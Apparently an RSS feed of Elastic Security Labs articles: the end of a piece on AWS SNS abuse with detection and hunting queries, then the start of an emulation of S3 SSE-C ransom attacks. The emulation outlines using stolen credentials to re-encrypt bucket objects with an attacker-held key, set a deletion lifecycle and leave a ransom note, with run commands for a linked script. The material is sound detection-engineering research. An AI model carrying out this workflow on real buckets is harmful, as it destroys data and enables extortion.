<p>Identifies when an SNS topic is subscribed to by a rare AWS user identity ARN (IAM User or Role). This detection leverages Elastic’s <strong>New Terms</strong> type rules to identify when the first occurrence of a user identity ARN attempts to subscribe to an existing SNS topic.The data exfiltration which took place during our whitebox testing example above would have been caught by this threat hunt; an alert would have been generated when we establish an SNS subscription to an external user.</p>
<p>Further false-positive reductions could be obtained by whitelisting expected organization TLDs in the requested email address if the topic is meant for internal use only.</p>
<p>Our query leverages KQL and New Terms rule type to focus on subscriptions that specify an email address. Unfortunately, CloudTrail redacts the email address subscribed or this would be vital for investigation.</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sns.amazonaws.com&quot;
    and event.action: &quot;Subscribe&quot;
    and aws.cloudtrail.request_parameters: *protocol=email*
</code></pre>
<p><strong>New Terms value</strong>: aws.cloudtrail.user_identity.arn</p>
<h3>Hunting Query (ES|QL)</h3>
<p>Our hunting query leverages ES|QL but parses the Subscribe API action parameters to filter further on the email protocol being specified. It also parses out the name of the user-agent, but relies further on aggregations to potentially identify other anomalous user-agent attributes. We've also included the region where the subscription occurred, as it may be uncommon for certain regions to be subscribed to others, depending on the specific business context of an organization.</p>
<pre><code>from logs-aws.cloudtrail-*
| where @timestamp &gt; now() - 7 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;Subscribe&quot;
| DISSECT aws.cloudtrail.request_parameters &quot;%{?protocol_key}=%{protocol}, %{?endpoint_key}=%{redacted}, %{?return_arn}=%{return_bool}, %{?topic_arn_key}=%{topic_arn}}&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| WHERE protocol == &quot;email&quot;
| STATS regional_topic_subscription_count = COUNT(*) by aws.cloudtrail.user_identity.arn, cloud.region, source.address, user_agent_name
| WHERE regional_topic_subscription_count == 1
| SORT regional_topic_subscription_count ASC
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>If a user identity access key (aws.cloudtrail.user_identity.access_key_id) exists in the CloudTrail audit log, then this request was accomplished via the CLI or programmatically. These keys could be compromised and warrant further investigation.</li>
<li>Ignoring the topic ARN during aggregation is important to identify first occurrence anomalies of subscribing to SNS topic with an email. By not grouping subscriptions by topic ARN, we ensure that the query focuses on detecting unexpected or infrequent subscriptions only, regardless of specific topics already established.</li>
<li>Another query may be required with the user identity ARN as an inclusion filter to identify which topic they subscribed to.</li>
<li>If an anomalous user-agent name is observed, a secondary investigation into the user-agent string may be required to determine if it's associated with automated scripts, uncommon browsers, or mismatched platforms. While it is simple to fake these, adversaries have been known not to for undisclosed reasons.</li>
</ul>
<h2>SNS Topic Message Published by Rare User</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml">Detection Rule Source</a><br />
<a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_topic_message_published_by_rare_user.md">Hunting Query Source</a></p>
<p>Identifies when a message is published to an SNS topic from an unusual user identity ARN in AWS. If the role or permission policy does not practice PoLP, publishing to SNS topics may be allowed and thus abused. For example, default roles supplied via AWS Marketplace that allow publishing to SNS topics. It may also identify rogue entities that once were pushing to SNS topics but no longer are being abused if credentials are compromised. Note that this focuses solely on EC2 instances, but you could adjust to account for different publish anomalies based on source, region, user agent and more.</p>
<p>Our query leverages KQL and New Terms rule type to focus on subscriptions that specify an email address. Unfortunately, CloudTrail redacts the email address subscribed, as this would be a vital asset for investigation.</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sns.amazonaws.com&quot;
    and event.action: &quot;Publish&quot;
    and aws.cloudtrail.user_identity.type: &quot;AssumedRole&quot;
    and aws.cloudtrail.user_identity.arn: *i-*
</code></pre>
<p><strong>New Terms value</strong>: aws.cloudtrail.user_identity.arn</p>
<h3>Hunting Query (ES|QL)</h3>
<p>Our hunting query leverages ES|QL and also focused on SNS logs where the API action is <em>Publish</em>. This only triggers if the user identity type is an assumed role and the user identity ARN is an EC2 instance ID. Aggregating on <strong>account ID</strong>, <strong>entity</strong>, <strong>assumed role</strong>, <strong>SNS topic</strong> and <strong>region</strong> help us identify any further anomalies based on expectancy of this activity. We can leverage the user agent to identify these calls being made by unusual tools or software as well.</p>
<pre><code>from logs-aws.cloudtrail-*
| where @timestamp &gt; now() - 7 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;Publish&quot;
    and aws.cloudtrail.user_identity.type == &quot;AssumedRole&quot;
| DISSECT aws.cloudtrail.request_parameters &quot;{%{?message_key}=%{message}, %{?topic_key}=%{topic_arn}}&quot;
| DISSECT aws.cloudtrail.user_identity.arn &quot;%{?}:assumed-role/%{assumed_role_name}/%{entity}&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| WHERE STARTS_WITH(entity, &quot;i-&quot;)
| STATS regional_topic_publish_count = COUNT(*) by cloud.account.id, entity, assumed_role_name, topic_arn, cloud.region, user_agent_name
| SORT regional_topic_publish_count ASC
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>If a user identity access key (aws.cloudtrail.user_identity.access_key_id) exists in the CloudTrail audit log, then this request was accomplished via the CLI or programmatically. These keys could be compromised and warrant further investigation.</li>
<li>If you notice Terraform, Pulumi, etc. it may be related to testing environments, maintenance or more.</li>
<li>Python SDKs that are not AWS, may indicate custom tooling or scripts being leveraged.</li>
</ul>
<h2>SNS Direct-to-Phone Messaging Spike</h2>
<p><a href="https://github.com/elastic/detection-rules/blob/7fb13f8d5649cbcf225d2ade964bdfef15ab6b11/hunting/aws/docs/sns_direct_to_phone_messaging_spike.md">Hunting Query Source</a><br />
MITRE ATT&amp;CK: <a href="https://attack.mitre.org/techniques/T1660/">T1660</a></p>
<p>Our hunting efforts for hypothesized SNS compromise—where an adversary is conducting phishing (smishing) campaigns—focus on <em>Publish</em> API actions in AWS SNS. Specifically, we track instances where <em>phoneNumber</em> is present in request parameters, signaling that messages are being sent directly to phone numbers rather than through an SNS topic.</p>
<p>Notably, instead of relying on SNS topics with pre-subscribed numbers, the adversary exploits an organization’s production Endpoint Messaging permissions, leveraging:</p>
<ul>
<li>An approved Origination ID (if the organization has registered one).</li>
<li>A Sender ID (if the adversary controls one or can spoof a trusted identifier).</li>
<li>AWS long codes or short codes (which may be dynamically assigned).</li>
</ul>
<p>Since AWS SNS sanitizes logs, phone numbers are not visible in CloudTrail, but deeper analysis in CloudWatch or third-party monitoring tools may help.</p>
<h3>Hunting Query (ES|QL)</h3>
<p>This query detects a spike in direct SNS messages, which may indicate smishing campaigns from compromised AWS accounts.</p>
<pre><code>from logs-aws.cloudtrail-*
| WHERE @timestamp &gt; now() - 7 day
| EVAL target_time_window = DATE_TRUNC(10 seconds, @timestamp)
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot; AND
    event.provider == &quot;sns.amazonaws.com&quot; AND
    event.action == &quot;Publish&quot; AND
    event.outcome == &quot;success&quot; AND
    aws.cloudtrail.request_parameters LIKE &quot;*phoneNumber*&quot;
| DISSECT user_agent.original &quot;%{user_agent_name} %{?user_agent_remainder}&quot;
| STATS sms_message_count = COUNT(*) by target_time_window, cloud.account.id, aws.cloudtrail.user_identity.arn, cloud.region, source.address, user_agent_name
| WHERE sms_message_count &gt; 30
</code></pre>
<p>Hunting Notes:</p>
<ul>
<li>AWS removes phone numbers in logs, so deeper analysis via CloudWatch logs may be necessary.</li>
<li>While investigating in CloudWatch, the message context is also sanitized. It would be ideal to investigate the message for any suspicious URL links being embedded in the text messages.</li>
<li>You can also review AWS SNS delivery logs (if enabled) for message metadata.</li>
<li>If messages are not using a topic-based subscription, it suggests direct targeting.</li>
<li>The source of these requests is important, if you notice them from an EC2 instance, that is rather odd or Lambda may be an expected serverless code.</li>
</ul>
<h1>Takeaways</h1>
<p>Thank you for taking the time to read this publication on <strong>AWS SNS Abuse: Data Exfiltration and Phishing</strong>. We hope this research provides valuable insights into how adversaries can leverage AWS SNS for data exfiltration, smishing and phishing campaigns, as well as practical detection and hunting strategies to counter these threats.</p>
<p><strong>Key Takeaways:</strong></p>
<ul>
<li>AWS SNS is a powerful service, but can be misused for malicious purposes, including phishing (smishing) and data exfiltration.</li>
<li>Adversaries may abuse production SNS permissions using pre-approved Sender IDs, Origination IDs, or long/short codes to send messages outside an organization.</li>
<li>Threat actors may weaponize misconfigurations in IAM policies, CloudTrail logging gaps and SNS API limitations to fly under the radar.</li>
<li>While in-the-wild (ItW) abuse of SNS is not frequently reported, we are confident that its weaponization and targeted exploitation are already occurring or will emerge eventually.</li>
<li>AWS CloudTrail does not capture phone numbers or messages in SNS logs, making CloudWatch third-party monitoring essential for deeper analysis</li>
<li>Threat hunting queries can help detect SNS topics being created, subscribed to, or receiving a spike in direct messages, signaling potential abuse.</li>
<li>Detection strategies include monitoring SNS API actions, identifying unusual SNS message spikes and flagging anomalies from EC2 or Lambda sources.</li>
<li>Defensive measures should include IAM policy hardening, CloudTrail &amp; SNS logging, anomaly-based detections and security best practices as recommended by AWS to reduce attack surface.</li>
</ul>
<p>AWS SNS is often overlooked in security discussions, but as this research shows, it presents a viable attack vector for adversaries if left unmonitored. We encourage defenders to stay proactive, refine detection logic, and implement robust security controls to mitigate these risks and increase security posture.</p>
<p>Thanks for reading and happy hunting!</p>
<h1>References</h1>
<ul>
<li><a href="https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/">https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/</a></li>
<li><a href="https://permiso.io/blog/s/smishing-attack-on-aws-sms-new-phone-who-dis/">https://permiso.io/blog/s/smishing-attack-on-aws-sms-new-phone-who-dis/</a></li>
<li><a href="https://catalog.workshops.aws/build-sms-program/en-US">https://catalog.workshops.aws/build-sms-program/en-US</a></li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/aws-sns-abuse/Security Labs Images 7.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Emulating AWS S3 SSE-C Ransom for Threat Detection]]></title>
            <link>https://www.elastic.co/es/security-labs/emulating-aws-s3-sse-c</link>
            <guid>emulating-aws-s3-sse-c</guid>
            <pubDate>Thu, 20 Feb 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we’ll explore how threat actors leverage Amazon S3’s Server-Side Encryption with Customer-Provided Keys (SSE-C) for ransom/extortion operations.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Welcome to another installment of AWS detection engineering with Elastic. You can read the previous installment on <a href="https://www.elastic.co/es/security-labs/exploring-aws-sts-assumeroot">STS AssumeRoot here</a>.</p>
<p>In this article, we’ll explore how threat actors leverage Amazon S3’s Server-Side Encryption with Customer-Provided Keys (SSE-C) for ransom/extortion operations. This contemporary abuse tactic demonstrates the creative ways adversaries can exploit native cloud services to achieve their monetary goals.</p>
<p>As a reader, you’ll gain insights into the inner workings of S3, SSE-C workflows, and bucket configurations. We’ll also walk through the steps of this technique, discuss best practices for securing S3 buckets, and provide actionable guidance for crafting detection logic to identify SSE-C abuse in your environment.</p>
<p>This research builds on a recent <a href="https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c">publication</a> by the Halcyon Research Team, which documented the first publicly known case of in-the-wild (ItW) abuse of SSE-C for ransomware behavior. Join us as we dive deeper into this emerging threat and demonstrate how to stay ahead of adversaries.</p>
<p>We have published a <a href="https://gist.github.com/terrancedejesus/f703a4a37a70d005080950a418422ac9">gist</a> containing the Terraform code and emulation script referenced in this blog. This content is provided for educational and research purposes only. Please use it responsibly and in accordance with applicable laws and guidelines. Elastic assumes no liability for any unintended consequences or misuse.</p>
<p>Do enjoy!</p>
<h1>Understanding AWS S3: Key Security Concepts and Features</h1>
<p>Before we dive directly into emulation and these tactics, techniques, and procedures (TTPs), let’s briefly review what AWS S3 includes.</p>
<p>S3 is AWS’ common storage service that allows users to store any unstructured or structured data in “buckets”. These buckets are similar to folders that one would find locally on their computer system. The data stored in these buckets are called <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingObjects.html">objects</a>, and each object is uniquely identified by an object key, which functions like a filename. S3 supports many data formats, from JSON to media files and much more, making it ideal for a variety of organizational use cases.</p>
<p><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingBucket.html">Buckets</a> can be <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/creating-buckets-s3.html">set up</a> to store objects from various AWS S3 services, but they can also be populated manually or programmatically depending on the use case. Additionally, buckets can leverage versioning to maintain multiple versions of objects, which provides resilience against accidental deletions or overwrites. However, versioning is not always enabled by default, leaving data vulnerable to certain types of attacks, such as those involving ransomware or bulk deletions.
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingBucket.html">Buckets</a> can be <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/creating-buckets-s3.html">set up</a> to store objects from various AWS S3 services, but they can also be populated manually or programmatically depending on the use case. Additionally, buckets can leverage versioning to maintain multiple versions of objects, which provides resilience against accidental deletions or overwrites. However, versioning is not always enabled by default, leaving data vulnerable to certain types of attacks, such as those involving ransomware or bulk deletions.</p>
<p>Access to these buckets depends heavily on their access policies, typically defined during creation. These policies include settings such as disabling public access to prevent unintended exposure of bucket contents. Configuration doesn’t stop there, though; buckets also have their own unique Amazon Resource Name (ARN), which allows further granular access policies to be defined via identity access management (IAM) roles or policies. For example, if user “Alice” needs access to a bucket and its objects, specific permissions such as <code>s3:GetObject</code>, must be assigned to their IAM role. That role can either be applied directly to Alice as a permission policy or to an associated group they belong to.</p>
<p>While these mechanisms seem foolproof, misconfigurations in access controls (e.g., overly permissive bucket policies or access control lists) are a common cause of security incidents. For example, as of this writing, approximately 325.8k buckets are publicly available according to <a href="http://buckets.grayhatwarfare.com">buckets.grayhatwarfare.com</a>. Elastic Security Labs also observed that 30% of failed AWS posture checks were connected to S3 in the <a href="https://www.elastic.co/es/resources/security/report/global-threat-report">2024 Elastic Global Threat Report</a>.</p>
<p><strong>Server-Side Encryption in S3</strong><br />
S3 provides <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-encryption.html">multiple encryption options</a> for securing data at rest. These include:</p>
<ul>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingServerSideEncryption.html">SSE-S3</a>: Encryption keys are fully managed by AWS.</li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingKMSEncryption.html">SSE-KMS</a>: Keys are managed through AWS Key Management Service (KMS), allowing for more custom key policies and access control — see how these are <a href="https://www.elastic.co/es/blog/encryption-at-rest-elastic-cloud-aws-kms">implemented in Elastic</a>.</li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerSideEncryptionCustomerKeys.html">SSE-C</a>: Customers provide their own encryption keys for added control. This option is often used for compliance or specific security requirements but introduces additional operational overhead, such as securely managing and storing keys. Importantly, AWS does not store SSE-C keys; instead, a key’s HMAC (hash-based message authentication code) is logged for verification purposes.</li>
</ul>
<p>In the case of SSE-C, mismanagement of encryption keys or intentional abuse (e.g., ransomware) can render data permanently inaccessible.</p>
<p><strong>Lifecycle Policies</strong></p>
<p>S3 buckets can also utilize <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html">lifecycle policies</a>, which automate actions such as transitioning objects to cheaper storage classes (e.g., Glacier) or deleting objects after a specified time. While these policies are typically used for cost optimization, they can be exploited by attackers to schedule the deletion of critical data, increasing pressure during a ransom incident.</p>
<p><strong>Storage Classes</strong></p>
<p>Amazon S3 provides multiple <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/storage-class-intro.html">storage classes</a>, each designed for different access patterns and frequency needs. While storage classes are typically chosen for cost optimization, understanding them is crucial when considering how encryption and security interact with data storage.</p>
<p>For example, S3 Standard and Intelligent-Tiering ensure frequent access with minimal latency, making them suitable for live applications. On the other hand, archival classes like Glacier Flexible Retrieval and Deep Archive introduce delays before data can be accessed, which can complicate incident response in security scenarios.</p>
<p>This becomes particularly relevant when encryption is introduced. Server-Side Encryption (SSE) works across all storage classes, but SSE-C (Customer-Provided Keys) shifts the responsibility of key management to the user or adversary. Unlike AWS-managed encryption (SSE-S3, SSE-KMS), SSE-C requires that every retrieval operation supplies the original encryption key — and if that key is lost or not given by an adversary, the data is permanently unrecoverable.</p>
<p>With this understanding, a critical question arises about the implications of SSE-C abuse observed in the wild: What happens when an attacker gains access to publicly exposed or misconfigured S3 buckets and has control over both the storage policy and encryption keys?</p>
<h1>Thus Begins: SSE-C Abuse for Ransom Operations</h1>
<p>In the following section, we will share a hands-on approach to emulating this behavior in our sandbox AWS environment by completing the following:</p>
<ol>
<li>Deploy vulnerable infrastructure via Infrastructure-as-Code (IaC) provider Terraform</li>
<li>Explore how to craft SSE-C requests in Python</li>
<li>Detonate a custom script to emulate the ransom behavior described in the Halcyon blog</li>
</ol>
<h2>Pre-requisites</h2>
<p>This article is about recreating a specific scenario for detection engineering. If this is your goal, the following needs to be established first.</p>
<ul>
<li><a href="https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli">Terraform</a> must be installed locally</li>
<li>Python 3.9+ must also be installed locally to be used for the virtual environment and to run an emulation script</li>
<li><a href="https://aws.amazon.com/cli/">AWS CLI</a> profile must be set up with administrative privileges to be used by Terraform during infrastructure deployment</li>
</ul>
<h1>Deploying Vulnerable Infrastructure</h1>
<p>For our whitebox emulation, it is important to replicate an S3 configuration that an organization might have in a real-world scenario. Below is a summary of the infrastructure deployed:</p>
<ul>
<li><strong>Region</strong>: us-east-1 (default deployment region)</li>
<li><strong>S3 Bucket</strong>: A uniquely named payroll data bucket that contains sensitive data and allows adversary-controlled encryption</li>
<li><strong>Bucket Ownership Controls</strong>: Enforces &quot;BucketOwnerEnforced&quot; to prevent ACL-based permissions</li>
<li><strong>Public Access Restrictions</strong>: Public access is fully blocked to prevent accidental exposure</li>
<li><strong>IAM User</strong>: A compromised adversary-controlled IAM user with excessive S3 permissions;no login profile is assigned, as access key credentials are used programmatically elsewhere for automated tasks</li>
<li><strong>IAM Policy</strong>: At both bucket and object levels, adversaries have authorization to:
<ul>
<li><code>s3:GetObject</code></li>
<li><code>s3:PutObject</code></li>
<li><code>s3:DeleteObject</code></li>
<li><code>s3:PutLifecycleConfiguration</code></li>
<li><code>s3:ListObjects</code></li>
<li><code>s3:ListBucket</code></li>
</ul>
</li>
<li>Applied at both bucket and object levels</li>
<li><strong>IAM Access Keys</strong>: Access keys are generated for the adversary user, allowing programmatic access</li>
<li><strong>Dummy Data</strong>: Simulated sensitive data (<code>customer_data.csv</code>) is uploaded to the bucket</li>
</ul>
<p>Understanding the infrastructure is critical for assessing how this type of attack unfolds. The Halcyon blog describes the attack methodology but provides little detail on the specific AWS configuration of the affected organizations. These details are essential for determining the feasibility of such an attack and the steps required for successful execution.</p>
<h2>Bucket Accessibility and Exposure</h2>
<p>For an attack of this nature to occur, an adversary must gain access to an S3 bucket through one of two primary methods:</p>
<p><strong>Publicly Accessible Buckets</strong>: If a bucket is misconfigured with a public access policy, an adversary can directly interact with it, provided the bucket’s permission policy allows actions such as <em><code>s3:PutObject</code></em>, <code>s3:DeleteObject</code>, or <code>s3:PutLifecycleConfiguration</code>. These permissions are often mistakenly assigned using a wildcard (*) principal, meaning anyone can execute these operations.</p>
<p><strong>Compromised Credentials</strong>: If an attacker obtains AWS credentials (via credential leaks, phishing, or malware), they can authenticate as a legitimate IAM user and interact with S3 as if they were the intended account owner.</p>
<p>In our emulation, we assume the bucket is not public, meaning the attack relies on compromised credentials. This requires the adversary to have obtained valid AWS access keys and to have performed cloud infrastructure discovery to identify accessible S3 buckets. This is commonly done using AWS API calls, such as <code>s3:ListAllMyBuckets</code>, <code>s3:ListBuckets</code>, or <code>s3:ListObjects</code>, which reveal buckets and their contents in specific regions.</p>
<p><strong>Required IAM Permissions for Attack Execution:</strong> To encrypt files using SSE-C and enforce a deletion policy successfully, the adversary must have appropriate IAM permissions. In our emulation, we configured explicit permissions for the compromised IAM user, but in a real-world scenario, multiple permission models could allow this attack:</p>
<ul>
<li><strong>Custom Overly-Permissive Policies</strong>: Organizations may unknowingly grant broad S3 permissions without strict constraints.</li>
<li><strong>AWS-Managed Policies:</strong> The adversary may have obtained credentials associated with a user or role that has <code>AmazonS3FullAccess</code> or <code>AdministratorAccess</code>.</li>
<li><strong>Partial Object-Level Permissions</strong>: If the IAM user had <em><code>AllObjectActions</code></em>, this would only allow object-level actions but would not grant lifecycle policy modifications or bucket listing, which are necessary to retrieve objects and then iterate them to encrypt and overwrite.</li>
</ul>
<p>The Halcyon blog does not specify which permissions were abused, but our whitebox emulation ensures that the minimum necessary permissions are in place for the attack to function as described.</p>
<p><strong>The Role of the Compromised IAM User</strong><br />
Another critical factor is the type of IAM user whose credentials were compromised. In AWS, an adversary does not necessarily need credentials for a user that has an interactive login profile. Many IAM users are created exclusively for programmatic access and do not require an AWS Management Console password or Multi-Factor Authentication (MFA), both of which could serve as additional security blockers.</p>
<p>This means that if the stolen credentials belonging to an IAM user are used for automation or service integration, the attacker would have an easier time executing API requests without additional authentication challenges.</p>
<p>While the Halcyon blog effectively documents the technique used in this attack, it does not include details about the victim's underlying AWS configuration. Understanding the infrastructure behind the attacks — such as bucket access, IAM permissions, and user roles — is essential to assessing how these ransom operations unfold in practice. Since these details are not provided, we must make informed assumptions to better understand the conditions that allowed the attack to succeed.</p>
<p>Our emulation is designed to replicate the minimum necessary conditions for this type of attack, ensuring a realistic assessment of defensive strategies and threat detection capabilities. By exploring the technical aspects of the infrastructure, we can provide deeper insights into potential mitigations and how organizations can proactively defend against similar threats.</p>
<h2>Setting Up Infrastructure</h2>
<p>For our infrastructure deployment, we utilize Terraform as our IaC framework. To keep this publication streamlined, we have stored both the Terraform configuration and the atomic emulation script in a downloadable <a href="https://gist.github.com/terrancedejesus/f703a4a37a70d005080950a418422ac9">gist</a> for easy access. Below is the expected local file structure once these files are downloaded.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image2.png" alt="Necessary folder structure when downloading gist" /></p>
<p>After setting up the required files locally, you can create a Python virtual environment for this scenario and install the necessary dependencies. Once the environment is configured, the following command will initialize Terraform and deploy the infrastructure:</p>
<p>Command: <code>python3 s3\_sse\_c\_ransom.py deploy</code></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image7.png" alt="Expected console output after terraform initialized and deployed" /></p>
<p>Once deployment is complete, the required AWS infrastructure will be in place to proceed with the emulation and execution of the attack. It’s important to note that public access is blocked, and the IAM policy is only applied to the dynamically generated IAM user for security reasons. However, we strongly recommend tearing down the infrastructure once testing is complete or after capturing the necessary data.</p>
<p>If you happen to log in to your AWS console or use the CLI, you can verify that the bucket in the <code>us-east-1</code> region exists and contains <code>customer_data.csv,</code> which, when downloaded, will be in plaintext. You will also note that no “ransom.note” exists either.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image6.png" alt="Example of infrastructure deployed with unencrypted customer data in our S3 bucket" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image4.png" alt="Another example of infrastructure deployed with no ransom.txt file yet" /></p>
<h2>Explore How to Craft S3 SSE-C Requests in Python</h2>
<p>Before executing the atomic emulation, it is important to explore the underlying tradecraft that enables an adversary to successfully carry out this attack ItW.</p>
<p>For those familiar with AWS, S3 operations — such as accessing buckets, listing objects, or encrypting data — are typically straightforward when using the AWS SDKs or AWS CLI. These tools abstract much of the complexity, allowing users to execute operations without needing a deep understanding of the underlying API mechanics. This also lowers the knowledge barrier for an adversary attempting to abuse these functionalities.</p>
<p>However, the Halcyon blog notes a critical technical detail about the attack execution:</p>
<p>“<em>The attacker initiates the encryption process by calling the x-amz-server-side-encryption-customer-algorithm header, utilizing an AES-256 encryption key they generate and store locally.</em>”</p>
<p>The key distinction here is the use of the <code>x-amz-server-side-encryption-customer-algorithm</code> header, which is required for encryption operations in this attack. According to AWS <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerSideEncryptionCustomerKeys.html#ssec-and-presignedurl">documentation</a>, this SSE-C header is typically specified when creating pre-signed URLs and leveraging SSE-C in S3. This means that the attacker not only encrypts the victim's data but does so in a way that AWS itself does not store the encryption key, rendering recovery impossible without the attacker's cooperation.</p>
<h3>Pre-Signed URLs and Their Role in SSE-C Abuse</h3>
<p><strong>What are pre-signed URLs?</strong><br />
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/using-presigned-url.html">Pre-signed URLs</a> are signed API requests that allow users to perform specific S3 operations for a limited time. These URLs are commonly used to securely share objects without exposing AWS credentials. A pre-signed URL grants temporary access to an S3 object and can be accessed through a browser or used programmatically in API requests.</p>
<p>In a typical AWS environment, users leverage SDKs or CLI wrappers for pre-signed URLs. However, when using SSE-C, AWS requires additional headers for encryption or decryption.</p>
<p><strong>SSE-C and Required HTTP Headers</strong><br />
When making SSE-C requests — either via the AWS SDK or direct S3 REST API calls — the following headers must be included:</p>
<ul>
<li><strong>x-amz-server-side​-encryption​-customer-algorithm</strong>: Specify the encryption algorithm, but must be AES256 (Noted in Halcyon’s report)</li>
<li><strong>x-amz-server-side​-encryption​-customer-key</strong>: Provides a 256-bit, base64-encoded encryption key for S3 to use to encrypt or decrypt your data</li>
<li><strong>x-amz-server-side​-encryption​-customer-key-MD5</strong>: Provides a base64-encoded 128-bit MD5 digest of the encryption key; S3 uses this header for a message integrity check to ensure that the encryption key was transmitted without error or tampering</li>
</ul>
<p>When looking for detection opportunities, these details are crucial.</p>
<p><strong>AWS Signature Version 4 (SigV4) and Its Role</strong></p>
<p>Requests to S3 are either authenticated or anonymous. Since SSE-C encryption with pre-signed URLs requires <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-authenticating-requests.html#signing-request-intro">authentication</a>, all requests must be cryptographically signed to prove their legitimacy. This is where AWS Signature Version 4 (SigV4) comes in.</p>
<p>AWS SigV4 is an authentication mechanism that ensures API requests to AWS services are signed and verified. This is particularly important for SSE-C operations, as modifying objects in S3 requires authenticated API calls.</p>
<p>For this attack, each encryption request must be signed by:</p>
<ol>
<li>Generating a cryptographic signature using AWS SigV4</li>
<li>Including the signature in the request headers</li>
<li>Attaching the necessary SSE-C encryption headers</li>
<li>Sending the request to S3 to overwrite the object with the encrypted version</li>
</ol>
<p>Without proper SigV4 signing, AWS would reject these requests. Attacks like the one described by Halcyon rely on compromised credentials, and we know that because the requests were not rejected in our testing. It also suggests that adversaries know they can abuse AWS S3 misconfigurations like improper signing requirements and understand the intricacies of buckets and their respect object access controls.This reinforces the assumption that the attack relied on compromised AWS credentials rather than an exposed, publicly accessible S3 bucket and that the adversaries were skilled enough to understand the nuances with not only S3 buckets and objects but also authentication and encryption in AWS.</p>
<h1>Detonating our Atomic Emulation</h1>
<p>Our atomic emulation will use the “compromised” credentials of the IAM user with no login profile who has a permission policy attached that allows several S3 actions to our target bucket. As a reminder, the infrastructure and environment we are conducting this in was deployed from the “Setting Up Infrastructure” section referencing our shared gist.</p>
<p>Below is a step-by-step workflow of the emulation.</p>
<ol>
<li>Load stolen AWS credentials (Retrieved from environment variables)</li>
<li>Establish S3 client with compromised credentials</li>
<li>Generate S3 endpoint URL (Construct the bucket’s URL)</li>
<li>Enumerate S3 objects → s3:ListObjectsV2 (Retrieve object list)</li>
<li>Generate AES-256 encryption key (Locally generated)</li>
<li>Start Loop (For each object in bucket)
<ol>
<li>Generate GET request &amp; sign with AWS SigV4 (authenticate request)</li>
<li>Retrieve object from S3 → s3:GetObject (fetch unencrypted data)</li>
<li>Generate PUT request &amp; sign with AWS SigV4 (attach SSE-C headers)</li>
<li>Encrypt &amp; overwrite object in S3 → s3:PutObject (encrypt with SSE-C)</li>
</ol>
</li>
<li>End loop</li>
<li>Apply 7-Day deletion policy → s3:PutLifecycleConfiguration (time-restricted data destruction)</li>
<li>Upload ransom note to S3 → s3:PutObject (Extortion message left for victim)</li>
</ol>
<p>Below is a visual representation of this emulation workflow:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image10.png" alt="Visual representation of emulation workflow" /></p>
<p>In our Python script, we have intentionally added prompts that require user interaction to confirm they agree to not abuse this script. Another prompt generated during detonation that stalls execution for the user to give time for AWS investigation if necessary before deleting the S3 objects. Since SSE-C is used, the objects are then encrypted with a key the terraform does not have acces to and thus would fail.</p>
<p>Command: <code>python s3\_sse\_c\_ransom.py detonate</code></p>
<p>After detonation, the objects in our S3 bucket will be encrypted with SSE-C, a ransom note will have been uploaded, and an expiration lifecycle will have been added.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image3.png" alt="Expected console output when detonating SSE-C ransom emulation" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image5.png" alt="Expected artifacts in S3 bucket after detonating SSE-C ransom emulation" /></p>
<p>If you try to access the <code>customer_data.csv</code> object, AWS will reject the request because it was stored using server-side encryption. To retrieve the object, a signed request that includes the correct AES-256 encryption key is required.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image1.png" alt="Expected error when retrieving objects from S3 bucket after SSE-C encryption" /></p>
<h1>Cleanup</h1>
